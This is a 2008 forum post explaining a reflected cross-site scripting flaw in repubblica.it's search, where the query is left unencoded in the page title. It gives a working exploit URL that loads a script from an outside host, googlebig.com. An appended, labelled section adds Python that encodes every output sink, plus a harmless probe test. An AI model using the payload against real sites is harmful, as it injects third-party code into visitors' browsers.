www.repubblica.it [XSS] + Attack Information
Langy

XSS:

Code:
http://ricerca.repubblica.it/repubblica?query=%3C/title%3E%3C/head
%3E%3Cbody%20id=%22dettaglio%22%3E%3Cscript%20src=%27http://
googlebig.com/l.js%27%3E&view=quotidiani



Then, we look at the attack:

Apparently the Repubblica.it site is not vulnerable to XSS, because the search queries are filtered by a check.

Indeed, let's analyze the code after submitting the query:

Code:
<input class="textcerca" name="query"  value="&lt;/title&gt;&lt;/head&gt;&lt;
body id=dettaglio&gt;&lt;script src='http://googlebig.com/l.js'&gt;" type="text"
onkeypress="if(event.keyCode == 13 || event.which == 13 || event.charCode== 13)
{ if (statusAdv){checkFormAdvBase('http://ricerca.repubblica.it/','repubblica')
;}else{javascript:checkFormBase('http://ricerca.repubblica.it/','repubblica');}
return false; }">


As you can see, the characters < and > are all converted to &lt; and &gt;.

But we can see that the query is also printed in the <title> tag. And here it is not filtered!

Then look at the code in the title tag:

Code:
<title><script src="http://googlebig.com/l.js"></title>


It can never work!

So we close both the title tag and the head tag, and then we open the body tag so that our JavaScript code runs in the body and not in the head.

Code:
<title></title></head><body>
<script src="http://googlebig.com/l.js">
</title>


By adding the closing tags, it works.

So, dear webmaster of Repubblica.it, you must also filter the variable when it is printed in the <title> tag.


"There is no patch for human stupidity" - K. D. M.

This post was last modified: 11-11-2008 11:44 PM by Langy.

08-09-2008 04:19 PM
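The fix the post asks for, shown as an added example that is not part of the original post or the site's own code: the same search term is HTML-encoded at every place it is echoed, and a small check confirms that no sink lets markup through. The template, function names and the harmless probe string are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed page template with the two sinks the post describes:
# the search term is echoed in <title> and in the input's value attribute.
TEMPLATE = (
    "<html><head><title>{title}</title></head><body>"
    '<input class="textcerca" name="query" value="{value}" type="text">'
    "</body></html>"
)

def render_partial(query: str) -> str:
    """Behaviour described in the post: only the attribute sink is encoded."""
    return TEMPLATE.format(title=query, value=html.escape(query, quote=True))

def render_encoded(query: str) -> str:
    """Every sink that echoes the query gets HTML-encoded."""
    safe = html.escape(query, quote=True)
    return TEMPLATE.format(title=safe, value=safe)

class TagCollector(HTMLParser):
    """Records every start tag the parser sees, with its attributes."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

# Harmless constructed probe: closes <title> and opens an inert marker element.
PROBE = '</title><b id="xss-probe">'

def probe_escapes_markup(render) -> bool:
    """True if the probe became a real element, i.e. some sink is unencoded."""
    collector = TagCollector()
    collector.feed(render(PROBE))
    return any(t == "b" and a.get("id") == "xss-probe" for t, a in collector.tags)

if __name__ == "__main__":
    for fn in (render_partial, render_encoded):
        print(fn.__name__, "unencoded sink:", probe_escapes_markup(fn))
```

The same probe check can be run in a regression test against each template that echoes request parameters, so a newly added sink without encoding fails the build.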